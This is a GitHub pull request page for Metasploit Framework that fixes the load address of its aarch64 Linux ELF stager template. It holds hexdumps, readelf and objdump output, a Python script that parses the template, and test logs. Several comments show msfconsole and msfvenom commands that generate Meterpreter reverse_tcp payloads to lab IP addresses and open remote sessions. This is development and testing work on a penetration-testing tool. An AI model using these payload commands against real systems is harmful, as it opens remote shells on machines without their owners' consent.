
set the org to be 0x400000 #16570

Merged
merged 1 commit into from
May 13, 2022

Conversation

ssst0n3
Contributor

@ssst0n3 ssst0n3 commented May 13, 2022

try to fix #16562

@bcoles
Contributor

bcoles commented May 13, 2022

# hexdump data/templates/template_aarch64_linux.bin
0000000 457f 464c 0102 0001 0000 0000 0000 0000
0000010 0002 00b7 0000 0000 0078 0000 0000 0000
0000020 0040 0000 0000 0000 0000 0000 0000 0000
0000030 0000 0000 0040 0038 0001 0000 0000 0000
0000040 0001 0000 0007 0000 0000 0000 0000 0000
0000050 0000 0000 0000 0000 0000 0000 0000 0000
0000060 beef dead 0000 0000 beef dead 0000 0000
0000070 1000 0000 0000 0000                    
0000078

# hexdump template_aarch64_linux.bin
0000000 457f 464c 0102 0001 0000 0000 0000 0000
0000010 0002 00b7 0000 0000 0078 0040 0000 0000
0000020 0040 0000 0000 0000 0000 0000 0000 0000
0000030 0000 0000 0040 0038 0001 0000 0000 0000
0000040 0001 0000 0007 0000 0000 0000 0000 0000
0000050 0000 0040 0000 0000 0000 0040 0000 0000
0000060 beef dead 0000 0000 beef dead 0000 0000
0000070 1000 0000 0000 0000                    
0000078

Before

# readelf -a data/templates/template_aarch64_linux.bin
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           AArch64
  Version:                           0x0
  Entry point address:               0x78
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0

There are no sections in this file.

There are no section groups in this file.

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x00000000deadbeef 0x00000000deadbeef  RWE    0x1000

There is no dynamic section in this file.

There are no relocations in this file.

The decoding of unwind sections for machine type AArch64 is not currently supported.

Dynamic symbol information is not available for displaying symbols.

No version information found in this file.
# objdump -x data/templates/template_aarch64_linux.bin 

data/templates/template_aarch64_linux.bin:     file format elf64-little
data/templates/template_aarch64_linux.bin
architecture: UNKNOWN!, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x0000000000000078

Program Header:
    LOAD off    0x0000000000000000 vaddr 0x0000000000000000 paddr 0x0000000000000000 align 2**12
         filesz 0x00000000deadbeef memsz 0x00000000deadbeef flags rwx

Sections:
Idx Name          Size      VMA               LMA               File off  Algn
SYMBOL TABLE:
no symbols

After

# readelf -a template_aarch64_linux.bin
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           AArch64
  Version:                           0x0
  Entry point address:               0x400078
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0

There are no sections in this file.

There are no section groups in this file.

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                 0x00000000deadbeef 0x00000000deadbeef  RWE    0x1000

There is no dynamic section in this file.

There are no relocations in this file.

The decoding of unwind sections for machine type AArch64 is not currently supported.

Dynamic symbol information is not available for displaying symbols.

No version information found in this file.
# objdump -x template_aarch64_linux.bin 

template_aarch64_linux.bin:     file format elf64-little
template_aarch64_linux.bin
architecture: UNKNOWN!, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x0000000000400078

Program Header:
    LOAD off    0x0000000000000000 vaddr 0x0000000000400000 paddr 0x0000000000400000 align 2**12
         filesz 0x00000000deadbeef memsz 0x00000000deadbeef flags rwx

Sections:
Idx Name          Size      VMA               LMA               File off  Algn
SYMBOL TABLE:
no symbols
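The two hexdump listings above contain the whole 120-byte template, so the change can be verified by parsing it. The following is an added example, not code from this PR or from Metasploit: it rebuilds both images from the hexdump words, decodes the ELF64 header and the single PT_LOAD program header with struct, and checks whether the segment's virtual address clears the kernel's vm.mmap_min_addr floor (assumed here to be the common 65536 default), which is the reason a PT_LOAD at address 0 cannot be mapped by an unprivileged process.

```python
import struct

# Copied from the PR comment's hexdump listing of the old template. hexdump
# prints 16-bit little-endian words, so the word "457f" is the byte pair 7f 45.
HEXDUMP_BEFORE = """\
0000000 457f 464c 0102 0001 0000 0000 0000 0000
0000010 0002 00b7 0000 0000 0078 0000 0000 0000
0000020 0040 0000 0000 0000 0000 0000 0000 0000
0000030 0000 0000 0040 0038 0001 0000 0000 0000
0000040 0001 0000 0007 0000 0000 0000 0000 0000
0000050 0000 0000 0000 0000 0000 0000 0000 0000
0000060 beef dead 0000 0000 beef dead 0000 0000
0000070 1000 0000 0000 0000
0000078"""
# The new template differs only at offset 0x18 (e_entry) and 0x50/0x58
# (p_vaddr/p_paddr), the two lines that also show up in the xxd diff later on.
HEXDUMP_AFTER = HEXDUMP_BEFORE.replace(
    "0078 0000 0000 0000", "0078 0040 0000 0000").replace(
    "0000050 0000 0000 0000 0000 0000 0000", "0000050 0000 0040 0000 0000 0000 0040")

# Elf64_Ehdr and Elf64_Phdr layouts (little endian) from the ELF-64 spec.
ELF64_EHDR = "<16sHHIQQQIHHHHHH"
ELF64_PHDR = "<IIQQQQQQ"
MMAP_MIN_ADDR = 0x10000  # assumed: the usual vm.mmap_min_addr default

def hexdump_to_bytes(text):
    """Rebuild the file bytes from hexdump's word-oriented listing."""
    out = bytearray()
    for line in text.splitlines():
        for word in line.split()[1:]:          # skip the offset column
            out += int(word, 16).to_bytes(2, "little")
    return bytes(out)

def parse_template(text):
    """Return the header fields that decide where the loader maps the stager.
    e_version is 0 here (EV_CURRENT is 1), which is what readelf's second
    'Version' line and file's 'invalid version' refer to."""
    data = hexdump_to_bytes(text)
    hdr = struct.unpack_from(ELF64_EHDR, data, 0)
    if hdr[0][:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ph = struct.unpack_from(ELF64_PHDR, data, hdr[5])   # hdr[5] is e_phoff
    return {"e_machine": hdr[2], "e_version": hdr[3], "e_entry": hdr[4],
            "p_type": ph[0], "p_flags": ph[1], "p_vaddr": ph[3],
            "p_filesz": ph[5], "p_align": ph[7], "size": len(data)}

def loads_unprivileged(fields):
    """False when the PT_LOAD segment sits below vm.mmap_min_addr: the kernel
    refuses that fixed mapping to a process without CAP_SYS_RAWIO."""
    return fields["p_type"] == 1 and fields["p_vaddr"] >= MMAP_MIN_ADDR
```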

@bwatters-r7 bwatters-r7 self-assigned this May 13, 2022
@bwatters-r7
Contributor

msf6 payload(windows/meterpreter/reverse_http) > use payload/linux/aarch64/meterpreter/reverse_tcp
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > set lport 4567
lport => 4567
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > generate -f elf -o revtcp_aarch64_4567.elf
[*] Writing 332 bytes to revtcp_aarch64_4567.elf...
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > show options

Module options (payload/linux/aarch64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  4567             yes       The listen port

msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 10.5.135.101:4567 
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > [*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (924572 bytes) to 10.5.132.146
[*] Meterpreter session 1 opened (10.5.135.101:4567 -> 10.5.132.146:43134) at 2022-05-13 10:32:30 -0500

msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 192.168.122.80
OS           : Ubuntu 18.04 (Linux 4.15.0-74-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > 

@bwatters-r7
Contributor

bwatters-r7 commented May 13, 2022

To highlight the changes, here is a diff of the readelf -a data for a payload generated before and after the change:

tmoose@ubuntu:~/rapid7/metasploit-framework$ diff old.txt new.txt 
11c11
<   Entry point address:               0x78
---
>   Entry point address:               0x400078
29c29
<   LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
---
>   LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000

And the binary template file

tmoose@ubuntu:~/rapid7/metasploit-framework$ diff xxd_output_aarch64_old.txt xxd_output_aarch64_new.txt 
2c2
< 00000010: 0200 b700 0000 0000 7800 0000 0000 0000  ........x.......
---
> 00000010: 0200 b700 0000 0000 7800 4000 0000 0000  ........x.@.....
6c6
< 00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
---
> 00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....

@bwatters-r7 bwatters-r7 merged commit 213d6a0 into rapid7:master May 13, 2022
@bwatters-r7
Contributor

Release Notes

This fixes a bug in the generation of aarch64 stagers so that when the stage is received and written to memory, the stage can execute in a lower-privileged process.

@bwatters-r7 bwatters-r7 added the rn-fix release notes fix label May 13, 2022
@h00die-gr3y
Contributor

h00die-gr3y commented May 16, 2023

Hi @bwatters-r7 ,
I still seem to have the same or similar issue on my Raspberry Pi 4 Model B Rev 1.2 running an ARM64 architecture.
It might also be related to the armle bug #16107.

msf6 exploit(multi/handler) > version
Framework: 6.3.10-dev
Console  : 6.3.10-dev
# uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
# lscpu
Architecture:            aarch64
  CPU op-mode(s):        32-bit, 64-bit
  Byte Order:            Little Endian
CPU(s):                  4
  On-line CPU(s) list:   0-3
Vendor ID:               ARM
  Model name:            Cortex-A72
    Model:               3
    Thread(s) per core:  1
    Core(s) per cluster: 4
    Socket(s):           -
    Cluster(s):          1
    Stepping:            r0p3
    CPU(s) scaling MHz:  67%
    CPU max MHz:         1500.0000
    CPU min MHz:         600.0000
    BogoMIPS:            108.00
    Flags:               fp asimd evtstrm crc32 cpuid
Caches (sum of all):
  L1d:                   128 KiB (4 instances)
  L1i:                   192 KiB (4 instances)
  L2:                    1 MiB (1 instance)
Vulnerabilities:
  Itlb multihit:         Not affected
  L1tf:                  Not affected
  Mds:                   Not affected
  Meltdown:              Not affected
  Spec store bypass:     Vulnerable
  Spectre v1:            Mitigation; __user pointer sanitization
  Spectre v2:            Vulnerable
  Srbds:                 Not affected
  Tsx async abort:       Not affected

Stageless payloads are working fine but staged payloads are failing with an illegal instruction error.

# msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST=192.168.201.10 LPORT=4444 -f elf -o aarch64-staged
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 212 bytes
Final size of elf file: 332 bytes
Saved as: aarch64-staged
# file aarch64-staged
aarch64-staged: ELF 64-bit LSB executable, ARM aarch64, invalid version (SYSV), statically linked, no section header
# chmod +x aarch64-staged
# ./aarch64-staged
Illegal instruction
msf6 exploit(multi/handler) >
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (949364 bytes) to 192.168.201.10
[-] Meterpreter session 12 is not valid and will be closed
[*]  - Meterpreter session 12 closed.
# msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=192.168.201.10 LPORT=4444 -f elf -o aarch64-stageless
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 1136368 bytes
Final size of elf file: 1136368 bytes
Saved as: aarch64-stageless
# file aarch64-stageless
aarch64-stageless: ELF 64-bit LSB pie executable, ARM aarch64, version 1 (SYSV), static-pie linked, with debug_info, not stripped
# chmod +x aarch64-stageless
# ./aarch64-stageless
msf6 exploit(multi/handler) >
[*] Meterpreter session 13 opened (192.168.201.10:4444 -> 192.168.201.10:42052) at 2023-05-16 20:43:14 +0000

An interesting observation is that the command file aarch64-staged produces an invalid version (SYSV) warning.

@h00die-gr3y
Contributor

readelf shows similar output, so I am beginning to think that it is more related to armle bug #16107.

# readelf -a ./aarch64-staged
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           AArch64
  Version:                           0x0
  Entry point address:               0x400078
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0

Labels
bug payload rn-fix release notes fix
Development

Successfully merging this pull request may close these issues.

linux/aarch64/shell_reverse_tcp: segment fault when run as normal user